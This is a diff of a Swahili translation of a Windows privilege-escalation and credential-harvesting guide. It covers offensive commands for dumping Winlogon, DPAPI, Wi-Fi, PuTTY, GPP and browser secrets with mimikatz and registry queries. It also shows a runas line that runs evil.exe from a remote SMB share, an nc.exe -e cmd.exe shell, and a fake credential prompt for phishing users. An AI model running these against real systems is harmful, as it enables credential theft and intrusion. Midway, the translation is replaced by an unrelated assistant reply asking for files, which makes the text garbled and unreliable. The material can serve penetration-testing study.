`C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` -Ikiwa unapata root user unaweza kusikiliza kwenye bandari yoyote (wakati wa kwanza utakapotumia `nc.exe` kusikiliza kwenye bandari itakuuliza kupitia GUI kama `nc` inapaswa kuruhusiwa na firewall). +Ikiwa unapata root user unaweza kusikiliza kwenye port yoyote (mara ya kwanza unapotumia `nc.exe` kusikiliza kwenye port itakuuliza kupitia GUI ikiwa `nc` inapaswa kuruhusiwa na firewall). ```bash wsl whoami ./ubuntun1604.exe config --default-user root wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu `--default-user root` +Ili kuanza bash kama root kwa urahisi, unaweza kujaribu `--default-user root` -Unaweza kuchunguza filesystem ya `WSL` katika folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` +Unaweza kuchunguza mfumo wa faili wa `WSL` katika folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` -## Vyeti vya Windows +## Uthibitisho wa Windows -### Vyeti vya Winlogon +### Winlogon Uthibitisho ```bash reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" @@ -730,16 +738,16 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword ``` -### Msimamizi wa credentials / Windows Vault +### Meneja wa Credentials / Windows Vault -Kutoka [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ -Windows Vault inahifadhi credentials za watumiaji kwa seva, tovuti na programu nyingine ambazo **Windows** inaweza **kuingia kwa watumiaji moja kwa moja**. Kwa mwonekano wa kwanza, inaweza kuonekana kwamba watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili kuingia moja kwa moja kupitia browsers. Lakini si hivyo. +Kutoka [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ +Windows Vault huhifadhi sifa za watumiaji kwa seva, tovuti na programu nyingine ambazo **Windows** inaweza **kuingia kwa watumiaji kiotomatiki**y. Kwa mwanzo, inaweza kuonekana kwamba watumiaji wanaweza kuhifadhi sifa zao za Facebook, Twitter, Gmail n.k., ili wajingie moja kwa moja kupitia vivinjari. Lakini sivyo. -Windows Vault inahifadhi credentials ambazo Windows inaweza kuzitumia kuingia kwa watumiaji moja kwa moja, ambayo ina maana kwamba programu yoyote ya **programu za Windows zinazohitaji credentials kupata rasilimali** (server au tovuti) **zinaweza kutumia Credential Manager** & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuandika username na password kila wakati. +Windows Vault huhifadhi sifa ambazo Windows inaweza kuingia kwa watumiaji kiotomatiki, ambayo inamaanisha kwamba programu yoyote ya **Windows inayohitaji sifa ili kufikia rasilimali** (seva au tovuti) **inaweza kutumia Credential Manager** & Windows Vault na kutumia sifa zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nywila kila mara. -Isipokuwa programu zinavyoshirikiana na Credential Manager, sipati kuwa zinaweza kutumia credentials za rasilimali fulani. Kwa hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani **wasiliane na Credential Manager na kuomba credentials za rasilimali hiyo** kutoka kwa vault ya hifadhi ya chaguo-msingi. +Isipokuwa programu hizo zinashirikiana na Credential Manager, sidhani kwamba zinaweza kutumia sifa za rasilimali fulani. Kwa hiyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani **kuwasiliana na credential manager na kuomba sifa za rasilimali hiyo** kutoka kwenye vault ya uhifadhi ya chaguo-msingi. -Tumia `cmdkey` ili kuorodhesha credentials zilizohifadhiwa kwenye mashine. +Tumia `cmdkey` kuorodhesha sifa zilizohifadhiwa kwenye mashine. ```bash cmdkey /list Currently stored credentials: @@ -747,11 +755,11 @@ Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` -Kisha unaweza kutumia `runas` kwa chaguo la `/savecred` ili kutumia saved credentials. Mfano ufuatao unaitisha remote binary kupitia SMB share. +Kisha unaweza kutumia `runas` kwa chaguo la `/savecred` ili kutumia sifa zilizohifadhiwa. Mfano ufuatao unaitisha binary ya mbali kupitia SMB share. ```bash runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` -Kutumia `runas` na seti ya taarifa za uthibitisho iliyotolewa. +Kutumia `runas` na seti ya credential iliyotolewa. ```bash C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" ``` @@ -759,37 +767,37 @@ Kumbuka kwamba mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/u ### DPAPI -The **Data Protection API (DPAPI)** inatoa njia ya ufichaji wa data kwa kutumia ufunguo wa simetriki, unatumiwa hasa ndani ya mfumo wa uendeshaji wa Windows kwa ajili ya ufichaji wa ufunguo binafsi wa asymmetric. Ufungaji huu unategemea siri ya mtumiaji au ya mfumo ili kuchangia kwa kiasi kikubwa entropia. +The **Data Protection API (DPAPI)** inatoa njia ya usimbaji wa simetriki wa data, inayotumika hasa ndani ya mfumo wa uendeshaji wa Windows kwa ajili ya usimbaji wa simetriki wa funguo binafsi za asymmetric. Usimbaji huu unatumia siri ya mtumiaji au mfumo ili kuchangia kwa kiasi kikubwa entropia. -**DPAPI inawezesha ufichaji wa funguo kupitia ufunguo wa simetriki unaotokana na siri za kuingia (login) za mtumiaji**. Katika matukio yanayohusisha ufichaji wa mfumo, inatumia siri za uthibitishaji za domain ya mfumo. +**DPAPI inaruhusu usimbaji wa funguo kupitia ufunguo wa simetriki unaotokana na siri za kuingia za mtumiaji**. Katika hali za usimbaji za mfumo, inatumia siri za uthibitishaji za domain ya mfumo. -Ufunguo wa RSA wa mtumiaji uliofichwa kwa kutumia DPAPI huhifadhiwa katika saraka %APPDATA%\Microsoft\Protect\{SID}, ambapo {SID} inaashiria [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier) ya mtumiaji. **Funguao la DPAPI, linaloshirikiwa na ufunguo mkuu unaolinda funguo binafsi za mtumiaji katika faili hiyo hiyo**, kwa kawaida linajumuisha 64 bytes za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekewa vikwazo, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). +Funguo za RSA za watumiaji zilizosimbwa kwa kutumia DPAPI huhifadhiwa kwenye kichunguzi `%APPDATA%\Microsoft\Protect\{SID}`, ambapo `{SID}` inawakilisha [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier) ya mtumiaji. **The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file**, kwa kawaida inajumuisha 64 bytes za data za nasibu. (Ni muhimu kukumbuka kwamba upatikanaji wa saraka hii umezuiliwa, ukizuia kuorodhesha yaliyomo yake kwa kutumia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). ```bash Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\ Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\ ``` -Unaweza kutumia **mimikatz module** `dpapi::masterkey` kwa hoja zinazofaa (`/pvk` au `/rpc`) ili kui-decrypt. +Unaweza kutumia **mimikatz module** `dpapi::masterkey` kwa hoja zinazofaa (`/pvk` au `/rpc`) ili kuifungua. -Kwa kawaida, **credentials files protected by the master password** ziko katika: +Mafaili ya **credentials yaliyolindwa na master password** kwa kawaida yanapatikana katika: ```bash dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ ``` -Unaweza kutumia **mimikatz module** `dpapi::cred` pamoja na `/masterkey` inayofaa ili ku-decrypt.\ -Unaweza **extract many DPAPI** **masterkeys** kutoka **memory** kwa kutumia module `sekurlsa::dpapi` (kama wewe ni root). +Unaweza kutumia **mimikatz module** `dpapi::cred` na `/masterkey` inayofaa ili decrypt.\ +Unaweza **extract many DPAPI** **masterkeys** kutoka **memory** kwa module ya `sekurlsa::dpapi` (ikiwa wewe ni root). {{#ref}} dpapi-extracting-passwords.md {{#endref}} -### PowerShell Credentials +### Vyeti vya PowerShell -**PowerShell credentials** mara nyingi hutumiwa kwa ajili ya **scripting** na automation tasks kama njia ya kuhifadhi encrypted credentials kwa urahisi. Credentials hizi zinalindwa kwa kutumia **DPAPI**, ambayo kwa kawaida ina maana kwamba zinaweza ku-decryptwa tu na mtumiaji yule yule kwenye kompyuta ile ile zilipotengenezwa. +Vyeti vya PowerShell mara nyingi hutumika kwa ajili ya uandishi wa script na kazi za otomatiki kama njia rahisi ya kuhifadhi vyeti vilivyosimbwa. Vyeti hivyo vinalindwa kwa kutumia DPAPI, ambayo kwa kawaida inamaanisha vinaweza kufunguliwa (ku-decrypt) tu na mtumiaji mmoja huo kwenye kompyuta ile ile ambako vilitengenezwa. -Ili **decrypt** PS credentials kutoka kwenye faili inayoiweka unaweza kufanya: +Ili **decrypt** PS credentials kutoka kwenye faili inayohifadhi, unaweza kufanya: ```bash PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml' PS C:\> $credential.GetNetworkCredential().username @@ -800,7 +808,7 @@ PS C:\htb> $credential.GetNetworkCredential().password JustAPWD! ``` -### Wifi +### Mtandao wa Wi-Fi ```bash #List saved Wifi using netsh wlan show profile @@ -809,34 +817,34 @@ netsh wlan show profile key=clear #Oneliner to extract all wifi passwords cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on* ``` -### Muunganisho za RDP zilizohifadhiwa +### Miunganisho ya RDP Zilizohifadhiwa -Unaweza kuzipata kwenye `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ +Unaweza kuziona katika `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ na katika `HKCU\Software\Microsoft\Terminal Server Client\Servers\` -### Amri zilizotekelezwa hivi karibuni +### Amri Zilizotumika Hivi Karibuni ``` HCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU HKCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ``` -### **Meneja wa Cheo za Remote Desktop** +### **Meneja wa Cheti za Remote Desktop** ``` %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings ``` -Tumia **Mimikatz** `dpapi::rdg` module na `/masterkey` inayofaa ili kuvunjua usimbuaji wa faili zozote za .rdg\ -Unaweza **kutoa masterkeys nyingi za DPAPI** kutoka kwenye kumbukumbu kwa kutumia Mimikatz `sekurlsa::dpapi` module +Tumia **Mimikatz** `dpapi::rdg` module pamoja na `/masterkey` inayofaa ili **decrypt any .rdg files**\ +Unaweza **extract many DPAPI masterkeys** kutoka kwenye kumbukumbu kwa kutumia Mimikatz `sekurlsa::dpapi` module ### Sticky Notes -Watu mara nyingi hutitumia app ya StickyNotes kwenye workstations za Windows **kuhifadhi nywila** na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inastahili kutafutwa na kuchunguzwa. +Watu mara nyingi hutumia app ya StickyNotes kwenye workstations za Windows kuhifadhi **nywila** na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inafaa kutafutwa na kuchunguzwa. ### AppCmd.exe -**Kumbuka kwamba ili kurejesha nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa kiwango cha High Integrity.**\ -**AppCmd.exe** iko katika saraka `%systemroot%\system32\inetsrv\`.\ -Iwapo faili hii ipo basi kuna uwezekano kwamba baadhi ya **credentials** zimetayarishwa na zinaweza **kurejeshwa**. +**Kumbuka kwamba ili ku-recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa High Integrity level.**\ +**AppCmd.exe** iko katika `%systemroot%\system32\inetsrv\` directory.\ +Kama faili hii ipo basi inawezekana kwamba baadhi ya **credentials** zimetangazwa na zinaweza ku-recovered. -Msimbo huu ulichukuliwa kutoka kwa [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): +Msimbo huu ulitolewa kutoka kwa [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): ```bash function Get-ApplicationHost { $OrigError = $ErrorActionPreference @@ -916,14 +924,14 @@ $ErrorActionPreference = $OrigError ``` ### SCClient / SCCM -Kagua kama `C:\Windows\CCM\SCClient.exe` ipo.\ -Mafaili ya kusakinisha huendeshwa kwa **SYSTEM privileges**, nyingi zina udhaifu kwa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** +Angalia kama `C:\Windows\CCM\SCClient.exe` inapatikana .\ +Wasakinishaji huendeshwa kwa **SYSTEM privileges**, wengi wao wana udhaifu kwa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** ```bash $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion if ($result) { $result } else { Write "Not Installed." } ``` -## Faili na Registry (Credentials) +## Mafaili na Registry (Credentials) ### Putty Creds ```bash @@ -933,23 +941,23 @@ reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_ ``` reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\ ``` -### SSH keys in registry +### SSH keys katika rejista -SSH private keys zinaweza kuhifadhiwa ndani ya funguo ya registry `HKCU\Software\OpenSSH\Agent\Keys`, kwa hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko: +SSH private keys zinaweza kuhifadhiwa ndani ya registry key `HKCU\Software\OpenSSH\Agent\Keys`, kwa hivyo unapaswa kuangalia kama kuna chochote cha kuvutia hapo: ```bash reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys' ``` -Kama utapata rekodi yoyote ndani ya njia hiyo, kuna uwezekano ni SSH key iliyohifadhiwa. Imehifadhiwa encrypted lakini inaweza kufunguliwa kwa urahisi (decrypted) kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ -More information about this technique here: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) +Ikiwa utapata ingizo lolote ndani ya njia hiyo, huenda ni ufunguo wa SSH uliohifadhiwa. Imehifadhiwa kwa usimbaji, lakini inaweza kufunguliwa kwa urahisi kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ +Taarifa zaidi kuhusu mbinu hii hapa: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -Kama `ssh-agent` service haifanyi kazi na unataka ianze moja kwa moja wakati wa boot, endesha: +Ikiwa huduma ya `ssh-agent` haifanyi kazi na ungependa ianze kiotomatiki wakati wa boot, endesha: ```bash Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service ``` > [!TIP] -> Inaonekana mbinu hii haitumiki tena. Nilijaribu kuunda ssh keys, kuziweka kwa `ssh-add` na kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya `dpapi.dll` wakati wa asymmetric key authentication. +> Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda baadhi ya ssh keys, kuziweka kwa `ssh-add` na kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya `dpapi.dll` wakati wa uthibitishaji wa funguo asimetri. -### Faili zisizohudumiwa +### Faili zilizoachwa ``` C:\Windows\sysprep\sysprep.xml C:\Windows\sysprep\sysprep.inf @@ -966,7 +974,7 @@ dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>n ``` Unaweza pia kutafuta faili hizi kwa kutumia **metasploit**: _post/windows/gather/enum_unattend_ -Mfano wa yaliyomo: +Mfano wa maudhui: ```xml @@ -985,7 +993,7 @@ Mfano wa yaliyomo: ``` -### SAM & SYSTEM chelezo +### Chelezo za SAM & SYSTEM ```bash # Usually %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM @@ -995,7 +1003,7 @@ Mfano wa yaliyomo: %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system ``` -### Vyeti vya Wingu +### Vyeti za Cloud ```bash #From user home .aws\credentials @@ -1007,15 +1015,15 @@ AppData\Roaming\gcloud\access_tokens.db ``` ### McAfee SiteList.xml -Tafuta faili liitwalo **SiteList.xml** +Tafuta faili inayoitwa **SiteList.xml** -### Nenosiri la GPP lililohifadhiwa +### Nywila ya GPP iliyohifadhiwa -Kipengele kilikuwa kimepatikana hapo awali kilichoruhusu ugawaji wa akaunti za msimamizi wa eneo zilizoundwa maalum kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML ndani ya SYSVOL, zingeweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyotambulishwa kwa umma, zingeweza ku-decrypt na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani ilingeweza kumruhusu mtumiaji kupata vigezo vya juu. +Kipengele kilikuwa kinapatikana hapo awali kilichoruhusu uenezaji wa akaunti za msimamizi wa kienyeji zilizobinafsishwa kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Walakini, njia hii ilipata kasoro kubwa za usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML katika SYSVOL, zilikuwa zinaweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyo wazi katika nyaraka, zingeweza kufunguliwa (decrypted) na mtumiaji yeyote aliyethibitishwa. Hii ilikuwa hatari kubwa, kwani inaweza kuruhusu watumiaji kupata uwezo uliopanuliwa. -Ili kupunguza hatari hii, ilitengenezwa function inayotafuta faili za GPP zilizohifadhiwa ndani zinazo na uwanja "cpassword" ambao si tupu. Baada ya kupata faili kama hiyo, function hu-decrypt nenosiri na hurudisha PowerShell object maalum. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, ikisaidia katika utambuzi na utatuzi wa udhaifu huu wa usalama. +Ili kupunguza hatari hii, ilitengenezwa function inayosaka faili za GPP zilizohifadhiwa mahali hapa zilizo na field ya "cpassword" ambayo si tupu. Ikiwa faili kama hilo linapatikana, function huifungua nywila (decrypt) na kurudisha custom PowerShell object. Object hii inajumuisha taarifa kuhusu GPP na eneo la faili, kusaidia kutambua na kurekebisha udhaifu huu wa usalama. -Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (kabla ya Windows Vista)_ kwa faili hizi: +Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ kwa faili hizi: - Groups.xml - Services.xml @@ -1029,11 +1037,11 @@ Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Do #To decrypt these passwords you can decrypt it using gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw ``` -Kutumia crackmapexec kupata nywila: +Kutumia crackmapexec kupata passwords: ```bash crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin ``` -### IIS Usanidi wa Web +### Usanidi wa Web wa IIS ```bash Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` @@ -1047,7 +1055,7 @@ C:\inetpub\wwwroot\web.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` -Mfano wa web.config yenye vitambulisho: +Mfano wa web.config yenye vifikisho: ```xml @@ -1057,7 +1065,7 @@ Mfano wa web.config yenye vitambulisho: ``` -### OpenVPN maelezo ya kuingia +### Nyaraka za kuingia za OpenVPN ```csharp Add-Type -AssemblyName System.Security $keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs" @@ -1077,7 +1085,7 @@ $entropy, Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes)) } ``` -### Faili za logi +### Logs ```bash # IIS C:\inetpub\logs\LogFiles\* @@ -1087,7 +1095,7 @@ Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAct ``` ### Omba credentials -Unaweza kila wakati **kumuuliza mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine** ikiwa unadhani anaweza kuzijua (kumbuka kwamba **kuuliza** mtumiaji moja kwa moja kwa **credentials** ni hatari sana): +Unaweza daima **kumuomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine** ikiwa unadhani anaweza kuwa anazijua (kumbuka kwamba **kumuuliza** mteja moja kwa moja kuhusu **credentials** ni hatari sana): ```bash $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password @@ -1095,9 +1103,9 @@ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::U #Get plaintext $cred.GetNetworkCredential() | fl ``` -### **Majina ya faili yanayoweza kuwa na vitambulisho** +### **Majina ya faili yanayoweza kuwa na credentials** -Faili zinazojulikana ambazo muda fulani uliopita ziliwahi kuwa na **nywila** katika **maandishi wazi** au **Base64** +Faili zilizojulikana ambazo hapo awali ziliwamo **passwords** kwa **clear-text** au **Base64** ```bash $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history vnc.ini, ultravnc.ini, *vnc* @@ -1161,21 +1169,7 @@ TypedURLs #IE %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat ``` -I don't have the files. Please either: - -- Paste the content of src/windows-hardening/windows-local-privilege-escalation/README.md (and any other files you want searched), or -- Give me a list of the "proposed files" you want searched, or -- Grant a link or repo path I can access. - -If you're working locally, you can list/search files with these commands (run in your repo root): - -- List files in that folder: - git ls-files "src/windows-hardening/windows-local-privilege-escalation/*" - -- Search for a term across those files: - git grep -n "SEARCH_TERM" -- src/windows-hardening/windows-local-privilege-escalation/ - -Once you provide the files or confirm which ones, I'll translate the relevant English text to Swahili, preserving markdown/html/tags/paths exactly as you specified. +Sina yaliyomo ya faili ulioorezea. Tafadhali tuma yaliyomo ya faili au orodha ya paths (mfano: src/windows-hardening/windows-local-privilege-escalation/README.md na faili zingine) ili niweze kutafuta na kutafsiri maandishi yanayohusika kwenda Kiswahili. ``` cd C:\ dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll" @@ -1184,15 +1178,15 @@ dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd ``` Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")} ``` -### Vyeti katika RecycleBin +### Credentials katika RecycleBin -Pia unapaswa kuangalia Bin kutafuta vyeti ndani yake +Unapaswa pia kuangalia Bin kutafuta credentials ndani yake -Ili kufufua nywila zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) +Ili **recover passwords** zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) -### Ndani ya rejista +### Ndani ya registry -**Vifunguo vingine vya rejista vinavyowezekana vyenye vyeti** +**Vifunguo vingine vya registry vinavyoweza kuwa na credentials** ```bash reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s @@ -1201,12 +1195,12 @@ reg query "HKCU\Software\OpenSSH\Agent\Key" ``` [**Extract openssh keys from registry.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -### Historia ya Vivinjari +### Browsers History -Unapaswa kuangalia dbs ambazo zinaweka nywila kutoka **Chrome or Firefox**.\ -Pia angalia historia, bookmarks na favourites za vivinjari kwani huenda baadhi ya **nywila** zimehifadhiwa pale. +Unapaswa kutafuta dbs ambapo password kutoka **Chrome or Firefox** zinahifadhiwa.\ +Pia angalia history, bookmarks na favourites za browsers kwani labda baadhi ya **passwords are** zimehifadhiwa hapo. -Zana za kutoa nywila kutoka kwenye vivinjari: +Tools to extract passwords from browsers: - Mimikatz: `dpapi::chrome` - [**SharpWeb**](https://github.com/djhohnstein/SharpWeb) @@ -1215,38 +1209,38 @@ Zana za kutoa nywila kutoka kwenye vivinjari: ### **COM DLL Overwriting** -**Component Object Model (COM)** ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu kuwasiliana kati ya vipengele vya programu vilivyoandikwa kwa lugha tofauti. Kila sehemu ya COM inatambulishwa kwa class ID (CLSID) na kila sehemu huonyesha utendakazi kupitia interface moja au zaidi, zinazotambulishwa kwa interface IDs (IIDs). +**Component Object Model (COM)** ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu **intercommunication** kati ya vipengele vya programu vinavyotumika kwa lugha tofauti. Kila sehemu ya COM inatambulika kupitia class ID (CLSID) na kila sehemu inafunua uwezo kupitia moja au zaidi ya interfaces, zinazo tambulika kupitia interface IDs (IIDs). -COM classes and interfaces zimefafanuliwa katika registry chini ya **HKEY\CLASSES\ROOT\CLSID** na **HKEY\CLASSES\ROOT\Interface** mtawalia. Registry hii imeundwa kwa kuchanganya **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** +COM classes na interfaces zimefafanuliwa kwenye registry chini ya **HKEY\CLASSES\ROOT\CLSID** na **HKEY\CLASSES\ROOT\Interface** mtawalia. Registry hii imeundwa kwa kuunganisha **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** -Ndani ya CLSIDs za registry hii unaweza kupata registry ndogo **InProcServer32** ambayo ina thamani ya default inayorejea kwenye **DLL** na thamani iitwayo **ThreadingModel** ambayo inaweza kuwa **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) au **Neutral** (Thread Neutral). +Ndani ya CLSIDs za registry hii unaweza kupata registry mdogo **InProcServer32** ambayo ina **default value** inayomaanisha kwa **DLL** na value inayoitwa **ThreadingModel** ambayo inaweza kuwa **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) au **Neutral** (Thread Neutral). ![](<../../images/image (729).png>) -Kwa msingi, ikiwa unaweza kuandika upya (overwrite) DLL yoyote itakayotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji tofauti. +Kwa msingi, ikiwa unaweza **overwrite any of the 